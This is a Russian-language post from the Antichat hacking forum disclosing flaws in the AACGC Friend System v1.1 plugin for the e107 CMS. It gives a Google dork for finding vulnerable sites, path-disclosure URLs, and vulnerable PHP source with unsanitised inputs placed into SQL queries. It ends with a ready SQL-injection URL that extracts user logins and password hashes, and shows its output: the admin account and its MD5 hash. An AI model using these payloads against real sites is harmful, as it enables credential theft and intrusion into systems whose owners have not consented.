|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
AACGC Friend System v.1.1 - плагин e107
скачать с plugins.e107.org
inurl:/e107_plugins/aacgc_friendsys/
Path disclosure
display_errors = on
PoC
Код:
Code:
http://[host]/[path]//e107_plugins/aacgc_friendsys/admin_menu.php
http://[host]/[path]/e107_plugins/aacgc_friendsys/User_Friend_List_menu.php
SQL inj
magic_quotes_gpc = Off, нужно быть авторизированым.
/e107_plugins/aacgc_friendsy/Friend_Requests.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]USER[/COLOR][COLOR="#007700"]){
if ([/COLOR][COLOR="#0000BB"]$pref[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'fl_enable_gold'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"])
{[/COLOR][COLOR="#0000BB"]$gold_obj[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]gold[/COLOR][COLOR="#007700"]();}
[/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'accept_user'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]$newuser[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$newfriend[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_friends'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_friend_sys"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"NULL, '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newuser[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newfriend[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]
/e107_handlers/mysql_class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]db_Insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$debug[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$log_type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$log_remark[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_IsLang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLcurTable[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$keyList[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"`"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"`,`"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]array_keys[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"`"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$valList[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]` ([/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$keyList[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]) VALUES ([/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$valList[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"])"[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'INSERT INTO '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]VALUES ([/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"])"[/COLOR][COLOR="#007700"];
}
if(![/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLaccess[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$db_ConnectionID[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLaccess[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db_ConnectionID[/COLOR][COLOR="#007700"];
}
if ([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLresult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'db_Insert'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$debug[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$log_type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$log_remark[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_insert_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLaccess[/COLOR][COLOR="#007700"]);
return ([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]TRUE[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// return true even if table doesn't have auto-increment.
[/COLOR][COLOR="#007700"]} else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]dbError[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"db_Insert ([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#DD0000"])"[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"];
}
}
[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]
PoC
SQL inj
надо быть авторизированым.
/e107_plugins/aacgc_friendsys/AddMe.php
Код:
Code:
require_once("../../class2.php");
require_once(HEADERF);
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$sub_action = $tmp[1];
$id = $tmp[2];
unset($tmp);
}
if (USER){
$sql->db_Select("aacgc_friend_sys", "*", "WHERE user_id = ".USERID."","");
$row = $sql->db_Fetch();
$sql2 = new db;
$sql2->db_Select("user", "*", "WHERE user_id = $sub_action ","");
$row2 = $sql2->db_Fetch();
print_r($row2);
//----------------------------------------------
/*...*/
$text .= "
Are You Sure You Want To Add ".$row2['user_name']." To Your Friends List?
";
/*...*/
Poc:
Код:
Code:
http://[host]/[path]/e107_plugins/aacgc_friendsys/AddMe.php?0.1%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20e107_user%20limit%200,1
Сообщение от None
Are You Sure You Want To Add admin:21232f297a57a5a743894a0e4a801fc3 To Your Friends List?
|